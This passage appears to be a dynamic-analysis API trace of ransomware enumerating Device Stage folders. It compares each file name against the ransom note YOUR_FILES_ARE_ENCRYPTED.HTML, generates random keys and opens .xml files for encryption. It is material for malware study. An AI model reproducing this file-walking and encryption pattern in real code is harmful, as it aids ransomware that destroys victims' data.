ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x647bcc04, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x113582dc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0x0, dwReserved1=0x60, cFileName="resource.xml", cAlternateFileName="")) returned 1 [0169.812] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml") returned 102 [0169.812] lstrcmpW (lpString1="resource.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.812] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0169.812] lstrlenW (lpString=".xml") returned 4 [0169.812] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0169.812] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0169.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.812] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64808ec4, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x64808ec4, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x113582dc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xcaa9, dwReserved0=0x0, dwReserved1=0x60, cFileName="ringtones.ico", cAlternateFileName="")) returned 1 [0169.812] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico") returned 103 [0169.812] lstrcmpW (lpString1="ringtones.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.813] PathFindExtensionW (pszPath="ringtones.ico") returned=".ico" [0169.813] lstrlenW (lpString=".ico") returned 4 [0169.813] PathFindExtensionW (pszPath="ringtones.ico") returned=".ico" [0169.813] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64808ec4, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x64808ec4, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x1137e43c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x10850, dwReserved0=0x0, dwReserved1=0x60, cFileName="settings.ico", cAlternateFileName="")) returned 1 [0169.813] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico") returned 102 [0169.813] lstrcmpW (lpString1="settings.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.813] PathFindExtensionW (pszPath="settings.ico") returned=".ico" [0169.813] lstrlenW (lpString=".ico") returned 4 [0169.813] PathFindExtensionW (pszPath="settings.ico") returned=".ico" [0169.813] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6482f024, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x6482f024, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x1137e43c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xc04b, dwReserved0=0x0, dwReserved1=0x60, cFileName="sync.ico", cAlternateFileName="")) returned 1 [0169.813] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico") returned 98 [0169.813] lstrcmpW (lpString1="sync.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.813] PathFindExtensionW (pszPath="sync.ico") returned=".ico" [0169.813] lstrlenW (lpString=".ico") returned 4 [0169.813] PathFindExtensionW (pszPath="sync.ico") returned=".ico" [0169.813] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1137e43c, ftCreationTime.dwHighDateTime=0x1c9ea14, ftLastAccessTime.dwLowDateTime=0x1137e43c, ftLastAccessTime.dwHighDateTime=0x1c9ea14, ftLastWriteTime.dwLowDateTime=0x1137e43c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x3473, dwReserved0=0x0, dwReserved1=0x60, cFileName="tasks.xml", cAlternateFileName="")) returned 1 [0169.813] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml") returned 99 [0169.813] lstrcmpW (lpString1="tasks.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.813] PathFindExtensionW (pszPath="tasks.xml") returned=".xml" [0169.813] lstrlenW (lpString=".xml") returned 4 [0169.813] PathFindExtensionW (pszPath="tasks.xml") returned=".xml" [0169.813] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0169.813] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.814] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64855184, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x64855184, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x1137e43c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x1b9f4, dwReserved0=0x0, dwReserved1=0x60, cFileName="wmp.ico", cAlternateFileName="")) returned 1 [0169.814] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico") returned 97 [0169.814] lstrcmpW (lpString1="wmp.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.814] PathFindExtensionW (pszPath="wmp.ico") returned=".ico" [0169.814] lstrlenW (lpString=".ico") returned 4 [0169.814] PathFindExtensionW (pszPath="wmp.ico") returned=".ico" [0169.814] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbaf3a20, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbaf3a20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaf3a20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.814] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0169.814] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.814] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbaf3a20, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbaf3a20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaf3a20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.814] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0169.814] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0169.814] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.814] GetProcessHeap () returned 0x270000 [0169.815] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0169.856] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9ebda38, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb19b80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", cAlternateFileName="{E35BE~1")) returned 1 [0169.856] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned 89 [0169.856] GetProcessHeap () returned 0x270000 [0169.856] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0169.856] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}" [0169.856] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*" [0169.856] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9ebda38, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb19b80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0169.857] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9ebda38, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb19b80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.857] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xcbaf3a20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaf3a20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-US", cAlternateFileName="")) returned 1 [0169.857] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned 95 [0169.857] GetProcessHeap () returned 0x270000 [0169.857] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0169.857] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US" [0169.857] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*" [0169.857] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xcbaf3a20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaf3a20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0169.857] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xcbaf3a20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaf3a20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.858] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84f5f4ea, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x852ccb00, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x84f5f4ea, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x5e8, dwReserved0=0x0, dwReserved1=0x60, cFileName="resource.xml", cAlternateFileName="")) returned 1 [0169.858] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml") returned 108 [0169.858] lstrcmpW (lpString1="resource.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.858] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0169.858] lstrlenW (lpString=".xml") returned 4 [0169.858] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0169.858] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0169.858] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.858] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbaf3a20, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbaf3a20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.858] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0169.858] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.858] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbaf3a20, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbaf3a20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.858] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0169.859] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0169.859] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.859] GetProcessHeap () returned 0x270000 [0169.860] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0169.860] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa84024fc, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa84024fc, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d8ea4dc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xd0a3, dwReserved0=0x0, dwReserved1=0x60, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0169.860] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico") returned 100 [0169.860] lstrcmpW (lpString1="folder.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.860] PathFindExtensionW (pszPath="folder.ico") returned=".ico" [0169.860] lstrlenW (lpString=".ico") returned 4 [0169.860] PathFindExtensionW (pszPath="folder.ico") returned=".ico" [0169.860] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8343e21, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa8343e21, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d8ea4dc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xe3c8, dwReserved0=0x0, dwReserved1=0x60, cFileName="print_pref.ico", cAlternateFileName="")) returned 1 [0169.860] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico") returned 104 [0169.860] lstrcmpW (lpString1="print_pref.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.860] PathFindExtensionW (pszPath="print_pref.ico") returned=".ico" [0169.860] lstrlenW (lpString=".ico") returned 4 [0169.860] PathFindExtensionW (pszPath="print_pref.ico") returned=".ico" [0169.860] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8369f80, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa8369f80, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d91063c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xebb8, dwReserved0=0x0, dwReserved1=0x60, cFileName="print_property.ico", cAlternateFileName="")) returned 1 [0169.860] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico") returned 108 [0169.860] lstrcmpW (lpString1="print_property.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.860] PathFindExtensionW (pszPath="print_property.ico") returned=".ico" [0169.860] lstrlenW (lpString=".ico") returned 4 [0169.860] PathFindExtensionW (pszPath="print_property.ico") returned=".ico" [0169.860] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa83b623e, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa83b623e, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d91063c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xdff5, dwReserved0=0x0, dwReserved1=0x60, cFileName="print_queue.ico", cAlternateFileName="")) returned 1 [0169.860] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico") returned 105 [0169.860] lstrcmpW (lpString1="print_queue.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.861] PathFindExtensionW (pszPath="print_queue.ico") returned=".ico" [0169.861] lstrlenW (lpString=".ico") returned 4 [0169.861] PathFindExtensionW (pszPath="print_queue.ico") returned=".ico" [0169.861] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa83b623e, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa83b623e, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d9a8bbc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xec75, dwReserved0=0x0, dwReserved1=0x60, cFileName="scan_.ico", cAlternateFileName="")) returned 1 [0169.861] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico") returned 99 [0169.861] lstrcmpW (lpString1="scan_.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.861] PathFindExtensionW (pszPath="scan_.ico") returned=".ico" [0169.861] lstrlenW (lpString=".ico") returned 4 [0169.861] PathFindExtensionW (pszPath="scan_.ico") returned=".ico" [0169.861] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa84024fc, 